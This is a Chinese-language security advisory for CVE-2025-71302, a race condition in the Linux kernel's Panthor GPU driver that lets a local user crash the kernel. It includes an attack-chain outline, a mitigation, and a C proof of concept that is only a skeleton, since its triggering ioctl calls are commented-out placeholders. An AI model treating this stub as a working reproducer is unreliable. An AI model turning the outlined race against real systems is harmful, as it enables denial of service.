CVE-2025-71302 CVSS 5.5 中危

CVE-2025-71302 Linux内核Panthor驱动竞争条件漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2025-71302

漏洞类型

竞争条件

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的drm/panthor驱动程序存在一个安全漏洞，涉及dma-fence的安全访问规则。该漏洞源于`drm_sched_fence_get_timeline_name`函数与`group_free_queue`函数之间存在竞争条件。攻击者利用此漏洞可能导致系统崩溃或拒绝服务，影响系统的可用性，但不会影响数据的机密性和完整性。

技术细节

该漏洞的核心在于违反了dma-fence的访问规则。Commit 506aa8b02a8d6定义了dma-fence的安全访问规范，要求在特定上下文中对fence对象的访问必须是安全的。在drm/panthor驱动中，当一个队列正在被释放（通过`group_free_queue`）时，另一个线程可能正在调用`drm_sched_fence_get_timeline_name`试图获取时间线名称。这种并发操作导致了竞态条件，可能引发释放后重用（UAF）或空指针解引用。由于CVSS评分为5.5（AV:L/AC:L/PR:L），本地低权限攻击者可以通过精心构造的图形渲染任务或直接调用相关ioctl来触发该竞态，从而导致内核崩溃（Kernel Panic），造成系统拒绝服务。

攻击链分析

STEP 1

步骤1：获取访问权限

攻击者需要在目标Linux系统上拥有本地低权限用户账号，能够访问图形渲染设备文件（如/dev/dri/renderD*）。

STEP 2

步骤2：触发竞态条件

攻击者运行恶意程序，创建多个线程。一部分线程频繁调用GPU任务提交接口以触发timeline名称查询，另一部分线程同时调用上下文销毁接口以触发队列释放。

STEP 3

步骤3：导致内核崩溃

由于缺乏适当的锁机制或安全访问保护，timeline查询函数访问了已被释放的队列内存，导致内核空指针引用或非法内存访问，引发Kernel Panic。

STEP 4

步骤4：达成拒绝服务

系统崩溃并重启或停止响应，造成可用性破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2025-71302 (Conceptual)
 * This code attempts to trigger the race condition between
 * drm_sched_fence_get_timeline_name and group_free_queue.
 * Compile with: gcc -o poc_cve2025_71302 poc_cve2025_71302.c -lpthread
 */

#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <string.h>

#define DEVICE_PATH "/dev/dri/renderD128" // Typical path, adjust as needed

// Simulating the structure of the ioctl call that triggers the path
// Actual IOCTL definitions would be needed from kernel headers

void* trigger_timeline_name(void* arg) {
    int fd = *(int*)arg;
    // This thread continuously calls operations that lead to
    // drm_sched_fence_get_timeline_name
    while (1) {
        // Pseudo-code for the triggering syscall
        // ioctl(fd, DRM_IOCTL_PANTHOR_SUBMIT, ...);
        usleep(100); // Attempt to create timing window
    }
    return NULL;
}

void* trigger_group_free(void* arg) {
    int fd = *(int*)arg;
    // This thread triggers the cleanup path (group_free_queue)
    while (1) {
        // Pseudo-code for destroying the context/queue
        // ioctl(fd, DRM_IOCTL_PANTHOR_CTX_FREE, ...);
        usleep(150); // Slight offset to increase race probability
    }
    return NULL;
}

int main() {
    int fd = open(DEVICE_PATH, O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    pthread_t t1, t2;

    printf("Starting PoC for CVE-2025-71302...\n");

    pthread_create(&t1, NULL, trigger_timeline_name, &fd);
    pthread_create(&t2, NULL, trigger_group_free, &fd);

    pthread_join(t1, NULL);
    pthread_join(t2, NULL);

    close(fd);
    return 0;
}

影响范围

Linux Kernel (Versions prior to fix including commits ab8c0de60f16d, eae60933abd11, efe24898485c5)

防御指南

临时缓解措施

如果无法立即升级内核，可以通过修改设备文件权限（如chmod o-rw /dev/dri/renderD*）来限制不可信用户访问Panthor驱动设备，从而阻断本地攻击路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表